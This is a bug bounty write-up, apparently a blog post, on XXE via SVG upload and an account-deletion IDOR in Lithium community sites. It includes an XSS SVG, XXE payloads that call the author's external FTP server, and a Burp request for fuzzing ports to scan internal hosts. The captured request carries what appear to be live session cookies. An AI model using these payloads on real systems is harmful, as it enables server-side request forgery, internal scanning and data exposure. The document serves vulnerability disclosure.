Vilnerability 1: XXE in community.{site}.com

There is an functionality in lithium community platform community.{site}.com  to upload avatars and image .This allows to upload svg file .During uploading SVG file (embedded with XML code) to the server the server XML parser started parsing XML in server side . These causes XXE which can produce severe and dangerous effect. The XXE attack allows an attacker to scan internal port,remote server port, upload dtd file ,FTP DOS attack and many. Below are the few which I am able to prove

1)Proved causing OOB XXE to my server vps0007.dasaweb.co.uk

2)Proved causing SSRF and port SCAN

3)Proved causing FTP DOS as FTP connection happening to my server vps0007.dasaweb.co.uk

4)information disclosure (sensitive)

STEP BY STEP POC:–

1)Logged in Community.{site}.com

Go to either https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx or https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

Image Upload option is https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx

Avatar Upload Option is https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

2)I tried to upload SVG file whose source code is below.After Uploading SVG file I can access it from Public with XSS executed.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,320 240,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      prompt('paswword please!');
   </script>
</svg>

Now after executing XSS using SVG file the second thought came to my mind to execute XXE. In svg file I embeded below XXE payload and I found the request is going to my server.


3)Upload it either going through Browse option of add image or avatar upload

4) I saw the request in my server where netcat is enable from ams1-nat.lithium.com

5)Now change the code of xml in svg file by putting FTP

<?xml version=”1.0″ ?><!DOCTYPE r [ <!ELEMENT r ANY >

<!ENTITY sp SYSTEM “FTP://vps0007.dasaweb.co.uk:9001/data.xml”>

]>

<r>&sp;</r>

6)Upload it and check the request in my server where netcat is enable from ams1-nat.lithium.com

listening on [37.59.68.106] 9001 …

connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 55535

As FTP is enable which will cause FTP DOS

6)Now Intercept the request of upload of svg file in BURP and send to intruder

REQUEST WILL BE LIKE THIS

POST /t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks HTTP/1.1

Host: community.{site}.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

X-Requested-With: XMLHttpRequest

Referer: https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

Content-Length: 988

Content-Type: multipart/form-data; boundary=—————————39612053628921

Cookie: optimizelyEndUserId=oeu1481831612267r0.5301134228318806; optimizelySegments=%7B%226174980032%22%3A%22referral%22%2C%226176630028%22%3A%22none%22%2C%226179250069%22%3A%22false%22%2C%226161020302%22%3A%22ff%22%7D; optimizelyBuckets=%7B%7D; _ga=GA1.2.856307035.1481831613; LithiumVisitor=~2mlCxJIBDYkI66Wpk~jJhAOVlH9wU3MOi6b0s0_wN3sAvU6am8nS91Ee6z_AFTDxdU4dO7YEIoybEGfdOptsQ6Y_Y8yH4Wt5qwPH-LtQ..; VISITOR_BEACON=~24arMJQ7k9e6Vls0T~1nsUYDVR1GQM3jnxF1qUNHxWE3Ck1CUe_1KwZuhtwQkwlvJoDYp5vshAyMWRzq1ZS26NHKJ9D0gKBoJcK0e2uA..; spot=%7B%22t%22%3A1483096080%2C%22m%22%3A%22us%22%2C%22p%22%3A%22open%22%2C%22w%22%3A%22%22%7D; sp_t=eabead6d001e35c9554cad2abe1f0e90; __tdev=GY64fzC6; fbm_174829003346=base_domain=.{site}.com; plp=e6e94d678d6ebc404cf77d5b7869462cb0a22231; __sonar=18159967670673728347; __gads=ID=42c92ad7292daba4:T=1483096014:S=ALNI_MaaH3lqaYxvUa3TM7DPX46Zz2Qa-w; sp_fi=1; sp_cc=1; sp_last_utm=%7B%22utm_source%22%3A%22{site}_webplayer%22%2C%22utm_medium%22%3A%22growth_conversion%22%2C%22utm_campaign%22%3A%22trial_accountoverview_all%22%2C%22utm_content%22%3A%22all500003%22%7D; __tumi=b7de3a83508bbe9f6412; {site}_market=uk; LiSESSIONID=09254C4F2C5AA57054F5336916B6103C; sp_dc=AQBo0ZT90RSICQpQvQpAJRz3FCjF9kIb6M0cTqxHkI8NdwCL_AsTUoUTQfatyjCizKmAP7cn2StzDcKwexD4jdG1; lithiumLogin:{site}=~2Y1sAQZ4B8FxaQTm4~rjKz7S1r1pjF_kMrSEjjEvkPNRocgqiBxhzDlT4oJHobkcK7egvELv9KoHpfSH-k; LithiumUserInfo=6161419; LithiumUserSecure=55ad1238-fb6a-4ab6-9ada-b23e8298a837; _gat=1

Connection: close

—————————–39612053628921

Content-Disposition: form-data; name=”anonAction”

true

—————————–39612053628921

Content-Disposition: form-data; name=”t:ac”

tab/user-icons

—————————–39612053628921

Content-Disposition: form-data; name=”t:cp”

block/propertyeditblocks

—————————–39612053628921

Content-Disposition: form-data; name=”Filename”

xxe_svg.svg

—————————–39612053628921

Content-Disposition: form-data; name=”Filesize”

251

—————————–39612053628921

Content-Disposition: form-data; name=”Filedata”; filename=”xxe_svg.svg”

Content-Type: image/svg+xml

<?xml version=”1.0″ standalone=”yes”?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM “FTP:// vps0007.dasaweb.co.uk:§9001§” > ]><svg width=”500px” height=”40px” xmlns=”http://www.w3.org/2000/svg” xmlns:xlink=”http://www.w3.org/1999/xlink” version=”1.1″>&xxe;</svg>

—————————–39612053628921—

7)Now FUZZ the PORT as here it is 9001 FTP:// vps0007.dasaweb.co.uk:§9001§”

Fuzz it from 20 to 90 in intruder and remember to put number of thread in intruder as 1.I have port 80 and 22,23 open.

You can see below port 22,23 and 80 has timeout which means it is open.

Now for internal LocalHost put 127.0.0.1:{port}.The moment you will put 127.0.0.1:{port} it will start scanning its own system disclosing the Open Port in its hosted system.


Vulnerability 2:IDOR to Delete Any Users Community Account ,any video ,any image

There is a functionality in which you can delete any lithium account.You can close your account .After you close your account, you can’t re-open it. When your account is closed, all kudos, accepted solutions,Posts,Friends and achievements will be permanently deleted. If you later decide to re-join the community, you must re-register and start from scratch. Closing your account will immediately log you out.

Now in this IDOR When User id is changed with Victim user ID then Victims account got delete after processing the Requests.This happens Because Application is not validating user Id with the Current Session Account holder.Due to that when User id got change with victim id ,victims account gets deleted.

Similarly for deleting users video and images application is using User ID and same logic is used to delete videos and images of other users.

Rewards and recognition:–

CompanySitesAward &Recog
spotifycommunity sites4000$
ING BankMany sites600$
PaypalCommunity sites500$
Ubiquity NetworkCommunity1500$
AT&TSites1500$

Leave a Reply

Your email address will not be published. Required fields are marked *